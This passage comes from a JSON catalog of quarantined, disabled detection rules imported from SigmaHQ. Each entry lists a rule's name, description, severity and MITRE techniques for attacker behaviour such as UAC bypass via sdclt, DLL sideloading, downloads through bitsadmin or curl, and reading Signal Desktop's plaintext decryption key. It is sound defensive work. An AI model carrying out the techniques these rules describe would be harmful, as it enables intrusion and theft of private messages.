"path": "detections/sigma-imports/_quarantine/redmimicry-winnti-playbook-registry-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" } }, { "id": "sigmahq-sigma-5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "type": "detection", "name": "Suspicious Interactive PowerShell as SYSTEM", "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-interactive-powershell-as-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" } }, { "id": "sigmahq-sigma-5b768e71-86f2-4879-b448-81061cbae951", "type": "detection", "name": "Suspicious Manipulation Of Default Accounts Via Net.EXE", "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-manipulation-of-default-accounts-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b768e71-86f2-4879-b448-81061cbae951", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_user_default_accounts_manipulation.yml" } }, { "id": "sigmahq-sigma-5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", "type": "detection", "name": "File With Suspicious Extension Downloaded Via Bitsadmin", "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1036.003", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-with-suspicious-extension-downloaded-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml" } }, { "id": "sigmahq-sigma-5b872a46-3b90-45c1-8419-f675db8053aa", "type": "detection", "name": "UAC Bypass via Sdclt", "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-via-sdclt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5b872a46-3b90-45c1-8419-f675db8053aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" } }, { "id": "sigmahq-sigma-5ba243e5-8165-4cf7-8c69-e1d3669654c1", "type": "detection", "name": "Potential DLL Sideloading Of MpSvc.DLL", "description": "Detects potential DLL sideloading of \"MpSvc.dll\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-mpsvc-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5ba243e5-8165-4cf7-8c69-e1d3669654c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_mpsvc.yml" } }, { "id": "sigmahq-sigma-5bac7a56-da88-4c27-922e-c81e113b20cb", "type": "detection", "name": "Github Self-Hosted Runner Execution", "description": "Detects GitHub self-hosted runners executing workflows on local infrastructure that could be abused for persistence and code execution.\nShai-Hulud is an npm supply chain worm targeting CI/CD environments.\nIt installs runners on compromised systems to maintain access after credential theft, leveraging their access to secrets and internal networks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102.002", "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-self-hosted-runner-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5bac7a56-da88-4c27-922e-c81e113b20cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_github_self_hosted_runner.yml" } }, { "id": "sigmahq-sigma-5bb68627-3198-40ca-b458-49f973db8752", "type": "detection", "name": "Rundll32 Execution Without Parameters", "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1570", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-execution-without-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5bb68627-3198-40ca-b458-49f973db8752", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml" } }, { "id": "sigmahq-sigma-5bed80b6-b3e8-428e-a3ae-d3c757589e41", "type": "detection", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.001", "T1090.002", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-over-reverse-ssh-tunnel-wfp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" } }, { "id": "sigmahq-sigma-5c80b618-0dbb-46e6-acbb-03d90bcb6d83", "type": "detection", "name": "Network Connection Initiated To AzureWebsites.NET By Non-Browser Process", "description": "Detects an initiated network connection by a non browser process on the system to \"azurewebsites.net\". The latter was often used by threat actors as a malware hosting and exfiltration site.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102", "T1102.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-azurewebsites-net-by-non-browser-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5c80b618-0dbb-46e6-acbb-03d90bcb6d83", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_azurewebsites.yml" } }, { "id": "sigmahq-sigma-5c82f0b9-3c6d-477f-a318-0e14a1df73e0", "type": "detection", "name": "Okta Security Threat Detected", "description": "Detects when an security threat is detected in Okta.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-security-threat-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_security_threat_detected.yml" } }, { "id": "sigmahq-sigma-5c84856b-55a5-45f1-826f-13f37250cf4e", "type": "detection", "name": "Malware User Agent", "description": "Detects suspicious user agent strings used by malware in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malware-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5c84856b-55a5-45f1-826f-13f37250cf4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_malware.yml" } }, { "id": "sigmahq-sigma-5c8d7b41-3812-432f-a0bb-4cfb7c31827e", "type": "detection", "name": "FortiGate - Firewall Address Object Added", "description": "Detects the addition of firewall address objects on a Fortinet FortiGate Firewall.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-firewall-address-object-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5c8d7b41-3812-432f-a0bb-4cfb7c31827e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_address_object.yml" } }, { "id": "sigmahq-sigma-5cb299fc-5fb1-4d07-b989-0644c68b6043", "type": "detection", "name": "Suspicious File Download From IP Via Curl.EXE", "description": "Detects potentially suspicious file downloads directly from IP addresses using curl.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-ip-via-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cb299fc-5fb1-4d07-b989-0644c68b6043", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml" } }, { "id": "sigmahq-sigma-5cc2cda8-f261-4d88-a2de-e9e193c86716", "type": "detection", "name": "Suspicious Processes Spawned by WinRM", "description": "Detects suspicious processes including shells spawnd from WinRM host process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-processes-spawned-by-winrm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrm_susp_child_process.yml" } }, { "id": "sigmahq-sigma-5cc90652-4cbd-4241-aa3b-4b462fa5a248", "type": "detection", "name": "Potential Recon Activity Via Nltest.EXE", "description": "Detects nltest commands that can be used for information discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-recon-activity-via-nltest-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_nltest_recon.yml" } }, { "id": "sigmahq-sigma-5cdb711b-5740-4fb2-ba88-f7945027afac", "type": "detection", "name": "Rundll32 UNC Path Execution", "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-unc-path-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cdb711b-5740-4fb2-ba88-f7945027afac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" } }, { "id": "sigmahq-sigma-5cddf373-ef00-4112-ad72-960ac29bac34", "type": "detection", "name": "HackTool - Koadic Execution", "description": "Detects command line parameters used by Koadic hack tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-koadic-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cddf373-ef00-4112-ad72-960ac29bac34", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_koadic.yml" } }, { "id": "sigmahq-sigma-5cdeaf3d-1489-477c-95ab-c318559fc051", "type": "detection", "name": "AppX Located in Known Staging Directory Added to Deployment Pipeline", "description": "Detects an appx package that was added to the pipeline of the \"to be processed\" packages that is located in a known folder often used as a staging directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/appx-located-in-known-staging-directory-added-to-deployment-pipeline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5cdeaf3d-1489-477c-95ab-c318559fc051", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_appx_package_in_staging_directory.yml" } }, { "id": "sigmahq-sigma-5ce0f04e-3efc-42af-839d-5b3a543b76c0", "type": "detection", "name": "Suspicious Process Execution From Fake Recycle.Bin Folder", "description": "Detects process execution from a fake recycle bin folder, often used to avoid security solution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-execution-from-fake-recycle-bin-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5ce0f04e-3efc-42af-839d-5b3a543b76c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml" } }, { "id": "sigmahq-sigma-5d0fdb62-f225-42fb-8402-3dfe64da468a", "type": "detection", "name": "User Added To Admin Group Via DseditGroup", "description": "Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-admin-group-via-dseditgroup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5d0fdb62-f225-42fb-8402-3dfe64da468a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml" } }, { "id": "sigmahq-sigma-5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13", "type": "detection", "name": "Remote Access Tool - ScreenConnect File Transfer", "description": "Detects file being transferred via ScreenConnect RMM", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-file-transfer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml" } }, { "id": "sigmahq-sigma-5d6c375a-18ae-4952-b4f6-8b803f6c8555", "type": "detection", "name": "File Access Of Signal Desktop Sensitive Data", "description": "Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json.\nThe db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data.\nSince the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials.\nCurrently the rule only covers the default Signal installation path in AppData\\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-access-of-signal-desktop-sensitive-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5d6c375a-18ae-4952-b4f6-8b803f6c8555", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_signal_sensitive_config_access.yml" } }, { "id": "sigmahq-sigma-5d756aee-ad3e-4306-ad95-cb1abec48de2", "type": "detection", "name": "GoToAssist Temporary Installation Artefact", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gotoassist-temporary-installation-artefact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" } }, { "id": "sigmahq-sigma-5daf11c3-022b-4969-adb9-365e6c078c7c", "type": "detection", "name": "CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked", "description": "Detects block events for files that are disallowed by code integrity for protected processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-disallowed-file-for-protected-processes-has-been-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5daf11c3-022b-4969-adb9-365e6c078c7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml" } }, { "id": "sigmahq-sigma-5de03871-5d46-4539-a82d-3aa992a69a83", "type": "detection", "name": "Registry Disable System Restore", "description": "Detects the modification of the registry to disable a system restore on the computer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-disable-system-restore.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5de03871-5d46-4539-a82d-3aa992a69a83", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_system_restore.yml" } }, { "id": "sigmahq-sigma-5de06a6f-673a-4fc0-8d48-bcfe3837b033", "type": "detection", "name": "System Information Discovery Using sw_vers", "description": "Detects the use of \"sw_vers\" for system information discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-using-sw-vers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5de06a6f-673a-4fc0-8d48-bcfe3837b033", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_swvers_discovery.yml" } }, { "id": "sigmahq-sigma-5df86130-4e95-4a54-90f7-26541b40aec2", "type": "detection", "name": "Registry Modification to Hidden File Extension", "description": "Hides the file extension through modification of the registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-to-hidden-file-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5df86130-4e95-4a54-90f7-26541b40aec2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hidden_extention.yml" } }, { "id": "sigmahq-sigma-5dfc1465-8f65-4fde-8eb5-6194380c6a62", "type": "detection", "name": "Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted", "description": "Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" registry value.\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-recall-feature-enabled-disableaidataanalysis-value-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5dfc1465-8f65-4fde-8eb5-6194380c6a62", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_enable_windows_recall.yml" } }, { "id": "sigmahq-sigma-5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "type": "detection", "name": "Suspicious Invoke-WebRequest Execution", "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-invoke-webrequest-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml" } }, { "id": "sigmahq-sigma-5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", "type": "detection", "name": "Cisco Stage Data", "description": "Various protocols maybe used to put data on the device for exfil or infil", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1074", "T1105", "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-stage-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 